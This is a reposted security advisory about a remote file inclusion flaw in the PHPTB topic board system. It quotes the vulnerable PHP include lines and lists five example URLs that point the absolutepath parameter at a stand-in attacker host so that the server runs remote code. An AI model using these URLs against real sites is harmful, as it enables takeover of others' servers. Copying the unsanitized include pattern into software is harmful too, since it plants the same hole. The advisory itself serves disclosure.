[转载]PHPTB代码注入漏洞

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

Summary
PHPTB is "an open source portal / topic board system". An input validation flaw in PHPTB code allows malicious attackers to cause the server to execute arbitrary code.

Credit:
The information has been provided by Filip Groszy ski.

Details
The vulnerable code exists in the following files: admin_o.php, board_o.php, dev_o.php, file_o.php and tech_o.php:
<?php
include $absolutepath.&#39;classes/smart_o.php&#39;;
... EOF

In dev_o.php and tech_o.php:
...
require $GLOBALS[&#39;absolutepath&#39;].&#39;userpass.php&#39;;
... EOF

Examples:
The following URLs can be used to tirgger the vulnerability:
http://[victim]/[dir]/classes/admin_o.php?absolutepath=http://[hacker_box]/
http://[victim]/[dir]/classes/board_o.php?absolutepath=http://[hacker_box]/
http://[victim]/[dir]/classes/dev_o.php?absolutepath=http://[hacker_box]/
http://[victim]/[dir]/classes/file_o.php?absolutepath=http://[hacker_box]/
http://[victim]/[dir]/classes/tech_o.php?absolutepath=http://[hacker_box]/